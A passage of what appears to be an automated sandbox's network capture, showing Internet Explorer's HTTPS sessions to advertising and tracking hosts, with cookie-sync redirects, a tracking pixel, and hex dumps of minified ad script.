t=c.bundles[e];i[e]={min:Math.trunc(100(+o+0)),max:Math.trunc(100(+o+0+t))},o+=t})}var l=t[0];if(null!=l&&l.bundles){var s=o,u=1-o;Object.keys(l.bundles).sort().forEach(function(e){var t=l.bundles[e];i[e]={min:Math.trunc(100(s+ua)),max:Math.
2021-10-07 13:51:49 UTC	7	IN	Data Raw: 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6f 29 7d 63 61 74 63 68 28 65 29 7b 7d 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 61 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 74 2c 6e 2e 62 75 62 62 6c 65 73 2c 6e 2e 63 61 6e 63 65 6c 61 62 6c 65 2c 6e 2e 64 65 74 61 69 6c 29 2c 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 61 29 7d 66 3d 7b 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 77 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f 3b 72 Data Ascii: indow.dispatchEvent(o)}catch(e){}var a=document.createEvent("CustomEvent");a.initCustomEvent(t,n.bubbles,n.cancelable,n.detail),window.dispatchEvent(a)}f={},window.__bt_intrnl={traceID:w.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o;r
2021-10-07 13:51:49 UTC	9	IN	Data Raw: 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 22 74 72 75 65 22 3d 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 66 6f 72 63 65 4d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 70 2e 77 65 62 73 69 74 65 49 44 26 26 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c Data Ascii: Content")\|\|p.contentEnabled,p.mobileContentEnabled="true"==localStorage.getItem("forceMobileContent")\|\|p.mobileContentEnabled),p.websiteID&&p.contentEnabled&&(!(n=/(android\|bb\d+\|meego).+mobile\|avantgo\|bada\/\|blackberry\|blazer\|compal\|elaine\|fennec\|hiptop\|
2021-10-07 13:51:49 UTC	10	IN	Data Raw: 74 73 29 7c 6d 6d 65 66 7c 6d 6f 28 30 31 7c 30 32 7c 62 69 7c 64 65 7c 64 6f 7c 74 28 5c 2d 7c 20 7c 6f 7c 76 29 7c 7a 7a 29 7c 6d 74 28 35 30 7c 70 31 7c 76 20 29 7c 6d 77 62 70 7c 6d 79 77 61 7c 6e 31 30 5b 30 2d 32 5d 7c 6e 32 30 5b 32 2d 33 5d 7c 6e 33 30 28 30 7c 32 29 7c 6e 35 30 28 30 7c 32 7c 35 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b Data Ascii: ts)\|mmef\|mo(01\|02\|bi\|de\|do\|t(\-\| \|o\|v)\|zz)\|mt(50\|p1\|v )\|mwbp\|mywa\|n10[0-2]\|n20[2-3]\|n30(0\|2)\|n50(0\|2\|5)\|n7(0(0\|1)\|10)\|ne((c\|m)\-\|on\|tf\|wf\|wg\|wt)\|nok(6\|i)\|nzph\|o2im\|op(ti\|wv)\|oran\|owg1\|p800\|pan(a\|d\|t)\|pdxg\|pg(13\|\-([1-8]\|c))\|phil\|pire\|pl(ay\|uc)\|pn\-2\|po(ck
2021-10-07 13:51:49 UTC	11	IN	Data Raw: 75 72 6e 5b 32 5d 7d 7d 29 7d 29 7d 28 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 28 29 3b 0a Data Ascii: urn[2]}})})}()}catch(e){}}();

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49822	18.195.217.206	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:53 UTC	23	OUT	GET /sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: rtb.mfadsrvr.com
2021-10-07 13:51:53 UTC	24	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, must-revalidate Date: Thu, 07 Oct 2021 13:51:53 GMT Location: https://rtb.mfadsrvr.com/ul_cb/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375 Set-Cookie: tuuid=8a6d375f-4587-406a-a533-3504255f4e66; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com Set-Cookie: c=1633614713; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com Set-Cookie: tuuid_lu=1633614713; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49823	18.195.217.206	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:53 UTC	25	OUT	GET /ul_cb/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: rtb.mfadsrvr.com Cookie: tuuid=8a6d375f-4587-406a-a533-3504255f4e66; c=1633614713; tuuid_lu=1633614713
2021-10-07 13:51:53 UTC	25	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, must-revalidate Date: Thu, 07 Oct 2021 13:51:53 GMT Location: //x.bidswitch.net/sync?dsp_id=250&expires=14&user_id=8a6d375f-4587-406a-a533-3504255f4e66&ssp=medianet Set-Cookie: tuuid=8a6d375f-4587-406a-a533-3504255f4e66; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com Set-Cookie: tuuid_lu=1633614713; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com Set-Cookie: bsw_uid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com Set-Cookie: ssh=!bidswitch,1633614713; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49830	18.156.81.187	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:53 UTC	26	OUT	GET /sync?dsp_id=250&expires=14&user_id=8a6d375f-4587-406a-a533-3504255f4e66&ssp=medianet HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: x.bidswitch.net Cookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; c=1633614712; tuuid_lu=1633614712
2021-10-07 13:51:53 UTC	27	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, must-revalidate Date: Thu, 07 Oct 2021 13:51:53 GMT Location: //contextual.media.net/cksync.php?cs=1&type=bs&ovsid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375&gdpr=&gdpr_consent=&gdpr_pd= Set-Cookie: cs=; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT; domain=.bidswitch.net; samesite=none; secure Set-Cookie: bsw_origin_init=; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT; domain=.bidswitch.net; samesite=none; secure Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49810	142.250.203.98	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:53 UTC	27	OUT	GET /pixel?cs=1&google_nid=media&google_cm=1&google_hm=Mjc2NjE2MzEyNjY4NDEzODAwMFYxMA%3D%3D&google_sc=1 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=57&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: cm.g.doubleclick.net Connection: Keep-Alive Cookie: IDE=AHWqTUlHPkNa6plymW9JTgSNVG2qEeIJ_G_IptnSH_2mFtME07xAKM_VEZoF-OQ-Uys
2021-10-07 13:51:53 UTC	28	IN	HTTP/1.1 302 Found P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Location: https://cs.media.net/cksync?type=g&cs=1&google_gid=CAESENlypXSQarzyPfZadJregtU&google_cver=1 Date: Thu, 07 Oct 2021 13:51:53 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Cross-Origin-Resource-Policy: cross-origin Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 301 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-07 13:51:53 UTC	29	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 63 73 2e 6d 65 64 69 61 2e 6e 65 74 2f 63 6b 73 79 6e 63 3f 74 79 70 65 3d 67 26 61 6d 70 3b 63 73 3d 31 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 67 69 64 3d 43 41 45 53 45 4e 6c 79 70 58 53 51 61 72 7a 79 50 66 5a 61 64 4a 72 65 67 74 55 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://cs.media.net/cksync?type=g&cs=1&google_gid=CAESENlypXSQarzyPfZadJregtU&

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49836	18.197.99.6	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:53 UTC	29	OUT	GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: pixel.advertising.com
2021-10-07 13:51:53 UTC	29	IN	HTTP/1.1 302 Found Date: Thu, 07 Oct 2021 13:51:53 GMT Content-Length: 0 Connection: close Strict-Transport-Security: max-age=31536000 Set-Cookie: APID=UPbaae6187-2775-11ec-83da-02a5fb3287ae;Version=1;Domain=.advertising.com;Path=/;Max-Age=31622400;Expires=Sat, 08-Oct-2022 13:51:53 GMT;Secure;SameSite=None P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: https://pixel.advertising.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49835	18.197.99.6	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:53 UTC	30	OUT	GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: pixel.advertising.com Cookie: APID=UPbaae6187-2775-11ec-83da-02a5fb3287ae
2021-10-07 13:51:53 UTC	31	IN	HTTP/1.1 302 Found Date: Thu, 07 Oct 2021 13:51:53 GMT Content-Length: 0 Connection: close Strict-Transport-Security: max-age=31536000 Set-Cookie: APID=UPbaae6187-2775-11ec-83da-02a5fb3287ae;Version=1;Domain=.advertising.com;Path=/;Max-Age=31622400;Expires=Sat, 08-Oct-2022 13:51:53 GMT;Secure;SameSite=None P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: https://ups.analytics.yahoo.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49838	18.156.0.31	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:53 UTC	31	OUT	GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: ups.analytics.yahoo.com
2021-10-07 13:51:53 UTC	32	IN	HTTP/1.1 302 Found Date: Thu, 07 Oct 2021 13:51:53 GMT Content-Length: 0 Strict-Transport-Security: max-age=31536000 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: https://ups.analytics.yahoo.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true Age: 0 Connection: close Server: ATS/7.1.2.138 Set-Cookie: A3=d=AQABBHn7XmECED9EQKD1rm_VP_Ee6eSFlJQFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAArHDJIVI0s-06yY7YAPRXTU; Expires=Fri, 7 Oct 2022 19:51:53 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly Set-Cookie: B=99545shglturp&b=3&s=qu; Expires=Fri, 7 Oct 2022 19:51:53 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49837	18.156.0.31	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:53 UTC	32	OUT	GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: ups.analytics.yahoo.com
2021-10-07 13:51:53 UTC	33	IN	HTTP/1.1 302 Found Date: Thu, 07 Oct 2021 13:51:53 GMT Content-Length: 0 Strict-Transport-Security: max-age=31536000 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: https://ups.analytics.yahoo.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae&verify=true Age: 0 Connection: close Server: ATS/7.1.2.138 Set-Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAAi1F1ZX9HUZ5b_X1VfLc_ec; Expires=Fri, 7 Oct 2022 19:51:53 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly Set-Cookie: B=e7a21vhglturp&b=3&s=jp; Expires=Fri, 7 Oct 2022 19:51:53 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49841	18.156.0.31	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:54 UTC	34	OUT	GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: ups.analytics.yahoo.com Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAAi1F1ZX9HUZ5b_X1VfLc_ec; B=99545shglturp&b=3&s=qu
2021-10-07 13:51:54 UTC	36	IN	HTTP/1.1 204 No Content Date: Thu, 07 Oct 2021 13:51:54 GMT Strict-Transport-Security: max-age=31536000 Set-Cookie: IDSYNC=18xa~20tp;Version=1;Domain=.analytics.yahoo.com;Path=/;Max-Age=31622400;Expires=Sat, 08-Oct-2022 13:51:54 GMT;Secure;SameSite=None P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Age: 0 Connection: close Server: ATS/7.1.2.138 Set-Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAAcIefteYeSFlJQ&S=AQAAAm9L7ZT7zwPRWLLWtDtkyjM; Expires=Fri, 7 Oct 2022 19:51:54 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly Set-Cookie: B=99545shglturp&b=3&s=qu; Expires=Fri, 7 Oct 2022 19:51:54 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49842	18.156.0.31	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:54 UTC	34	OUT	GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae&verify=true HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: ups.analytics.yahoo.com Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAAi1F1ZX9HUZ5b_X1VfLc_ec; B=e7a21vhglturp&b=3&s=jp
2021-10-07 13:51:54 UTC	35	IN	HTTP/1.1 204 No Content Date: Thu, 07 Oct 2021 13:51:54 GMT Strict-Transport-Security: max-age=31536000 Set-Cookie: IDSYNC=18xa~20tp;Version=1;Domain=.analytics.yahoo.com;Path=/;Max-Age=31622400;Expires=Sat, 08-Oct-2022 13:51:54 GMT;Secure;SameSite=None Set-Cookie: APID=UPbaae6187-2775-11ec-83da-02a5fb3287ae;Version=1;Domain=.yahoo.com;Path=/;Max-Age=7380485;Expires=Sat, 01-Jan-2022 00:00:00 GMT;Secure;SameSite=None Set-Cookie: APIDTS=1633614714;Version=1;Domain=.yahoo.com;Path=/;Max-Age=86400;Expires=Fri, 08-Oct-2021 13:51:54 GMT;Secure;SameSite=None P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Age: 0 Connection: close Server: ATS/7.1.2.138 Set-Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAAcIefteYfxBqOM&S=AQAAAqUUw86y1PdZ3on3l4PzIe8; Expires=Fri, 7 Oct 2022 19:51:54 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly Set-Cookie: B=e7a21vhglturp&b=3&s=jp; Expires=Fri, 7 Oct 2022 19:51:54 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49806	172.67.69.19	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:51 UTC	11	OUT	GET /px.gif?ch=1&e=0.8749585328117704 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ad-delivery.net Connection: Keep-Alive
2021-10-07 13:51:51 UTC	14	IN	HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 13:51:51 GMT Content-Type: image/gif Content-Length: 43 Connection: close X-GUploader-UploadID: ABg5-UzSZ-Kt1WbGdd88HlCnZf7YcJGLu-DR5tPwPS9bXoxAsvJYwt4jGn6LAHoZbG34sctt0vecv7iFCJZExLBCcbRvF7nEjw Expires: Thu, 07 Oct 2021 13:34:36 GMT Last-Modified: Wed, 05 May 2021 19:25:32 GMT ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3" x-goog-generation: 1620242732037093 x-goog-metageneration: 5 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 43 x-goog-hash: crc32c=cpEfJQ== x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow== x-goog-storage-class: MULTI_REGIONAL Access-Control-Allow-Origin: * Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace Age: 1970 Cache-Control: public, max-age=86400 CF-Cache-Status: HIT Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zJqUwV3i9RyjMJLDirrz6hbaZKYKutqjTjZ7b1bqp42FLOB5%2BknfLIl4xD1mAfy9CwE25LULjZzYJfl59RwI2DKX1LWVkw9DMDiSbqEc0vAM8feMR2PQ%2F11BLWn7vvLMAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69a79b4dbbe568f7-FRA
2021-10-07 13:51:51 UTC	15	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c Data Ascii: GIF89a!,
2021-10-07 13:51:51 UTC	15	IN	Data Raw: 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49847	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
